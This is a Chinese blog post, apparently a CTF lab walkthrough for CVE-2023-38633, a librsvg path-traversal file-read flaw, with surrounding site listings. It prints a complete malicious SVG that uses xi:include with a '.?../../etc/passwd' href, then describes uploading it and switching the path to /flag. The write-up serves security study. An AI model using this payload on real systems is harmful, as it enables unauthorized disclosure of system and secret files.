librsvg 外部实体漏洞(CVE-2023-38633)

最新推荐文章于 2024-10-02 08:00:00 发布
最新推荐文章于 2024-10-02 08:00:00 发布
阅读量198 收藏
点赞数 3
分类专栏: # XXE # 文件读取 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140764933
版权

一、漏洞概述

一个在 librsvg 2.56.3 之前版本中 URL 解码器的目录遍历问题,可以被本地或远程攻击者用来泄露文件(在预期区域之外的本地文件系统上),例如通过在 xi:include 元素中使用 href=".?../../../../../../../../../../etc/passwd" 来读取结果。

二、影响范围

librsvg < 2.56.3

三、访问页面

四、漏洞复现

1、制作payload,xxe.svg文件

<?xml version="1.0" encoding="UTF-8" standalone="no"?>  
<svg width="1000" height="1000" xmlns:xi="http://www.w3.org/2001/XInclude">  
   <rect width="600" height="600" style="fill:rgb(255,255,255);" />  
   <text x="10" y="100">  
     <xi:include href=".?../../../../../../../../etc/passwd" parse="text"   
encoding="UTF-8">  
       <xi:fallback>file not found</xi:fallback>  
     </xi:include>  
   </text>  
</svg>

2、在页面中上传

3、获取flag,修改xxe.svg文件中的/etc/passwd为/flag再上传。

风中追风-fzzf
关注
专栏目录
librsvg-2.56.3
10-08
librsvg-2.56.3
librsvg2-devel-2.42.7-4.el8.i686.rpm
12-11
官方离线安装包,亲测可用
【春秋云境】CVE-2023-38633 librsvg 2.56.3 之前版本中 URL 解码器的目录遍历问题,可以被本地或远程攻击者用来泄露文件
HMX404的博客
04-01 622
鉴于对URL解析器所在位置的理解,我们从librsvg中获取了相关部分,并设置了一个模糊处理工具(“resolve”),以在遇到来自磁盘上的“current.svg”文件的引用(href、XInclude等)时运行与解析URL逻辑相同的逻辑。这使我们能够快速测试和模糊输入,以了解解析器和验证逻辑是如何评估的。模糊化的一些有趣输出如下:resolve“current.svg”:按预期通过。
【春秋云镜】CVE-2023-38633librsvg <2.56.3版本中存在XXE漏洞
orchid_sea的博客
06-07 610
一个在 librsvg 2.56.3 之前版本中 URL 解码器的目录遍历问题,可以被本地或远程攻击者用来泄露文件(在预期区域之外的本地文件系统上),例如通过在 xi:include 元素中使用 href=“.?../…/…/…/…/…/…/…/…/…/etc/passwd” 来读取结果。
CVE-2023-38633~XXE注入【春秋云境靶场渗透】
weixin_67832625的博客
08-11 414
今天我们来攻克春秋云境CTF的CVE-2023-38633。这个靶场网上资源不是很多,所以我给大家搞一篇详细教程,供读者使用参考,如有问题,随时联系笔者。
pikahcu靶场-12 目录遍历,敏感信息泄露,不安全的URL跳转
weixin_52180702的博客
12-14 506
在web功能设计中,很多时候我们会要将需要访问的文件定义成变量,从而让前端的功能便的更加灵活。当用户发起一个前端的请求时,便会将请求的这个文件的值(比如文件名称)传递到后台,后台再执行其对应的文件。在这个过程中,如果后台没有对前端传进来的值进行严格的安全考虑,则攻击者可能会通过“…/”这样的手段让后台打开或者执行一些其他的文件。从而导致后台服务器上其他目录的文件结果被遍历出来,形成目录遍历漏洞
【春秋云镜】CVE-2023-38633
2301_79200709的博客
08-28 292
春秋云镜CVE-2023-38633
node-canvas模块安装使用过程中报错的解决方法
星精灵的新世纪
03-30 6095
作为前端,经常会使用到canvas的依赖项,但是前端在node-canvas安装过程中往往会出现python或者vs 报错的情况,这是由于win10的c++环境配置不对造成,花费两天时间,不断根据各种说明安装了各种软件后 npm install canvas // or yarn add canvas 使用以上命令安装到一半,依然报错! 解决方案: 从github的node-canvas的以下地址把成品版本canvas-v2.9.1-node-v93-win32-unknown-x64.tar.g
librsvg2-devel-2.40.20-1.el7.x86_64.rpm
11-30
离线安装包,亲测可用
librsvg2-2.40.20-1.el7.x86_64.rpm
12-11
官方离线安装包,亲测可用
librsvg2-devel-2.42.7-4.el8.aarch64.rpm
12-11
官方离线安装包,亲测可用
使用socket编程来实现一个简单的C/S模型(TCP协议)
最新发布
caiji0169的博客
10-02 1199
下图是基于TCP协议的客户端/服务器程序的一般流程:服务器调用socket()、bind()、listen()完成初始化后,调用accept()阻塞等待,处于监听端口的状态,客户端调用socket()初始化后,调用connect()发出SYN段并阻塞等待服务器应答,服务器应答一个SYN-ACK段,客户端收到后从connect()返回,同时应答一个ACK段,服务器收到后从accept()返回。数据传输的过程:建立连接后,TCP协议提供全双工的通信服务,但是一般的客户端/服务器程序的流程是由客户端主动发起请求,
MQTT--EMQX入门+MQTTX使用
CJPSR的博客
09-30 1063
EMQ X基于 Erlang/OTP 平台开发的MQTT 消息服务器,是开源社区中最流行的 MQTT 消息服务器。EMQ X 是开源百万级分布式。
信息安全对抗演习:应对网络威胁的坚实防线
dexun123的博客
09-29 844
演习结束后,需要对整个演习过程进行总结和评估。分析演习中发现的问题和不足并提出改进措施;同时总结经验教训为未来的演习提供参考。
网络层——IP
weixin_74269833的博客
09-28 1164
由32位二进制数组成,通常用点分的形式被分为四个部分,每个部分1byte,最大值为255。从功能的角度看,ip地址由两部分组成,网络号和主机号。网络号标识了ip所在的网段,主机号标识了在该网段中的唯一的一台主机。二者的区分又需要与掩码配合使用,例如192.168.1.2/24,24表示掩码255.255.255.0,将掩码与ip进行按位与操作,获得了192.168.1.0即为该主机所在网段。将IP地址中的主机地址全部设为0, 就成为了网络号, 代表这个局域网。
通信工程学习:什么是LAN局域网、MAN城域网、WAN广域网
limengshi138392的博客
09-29 914
通信工程学习:什么是LAN局域网、MAN城域网、WAN广域网
网络安全学习路线图(2024版详解)
baimaozi008的博客
09-27 1081
近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以的完成上岸,还能够系统化学习,提升自己的后期竞争力。
QEMU 用户网络与桥接网络设置总结
aspirestro三水问海的博客
09-28 455
QEMU 用户网络与桥接网络设置总结
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值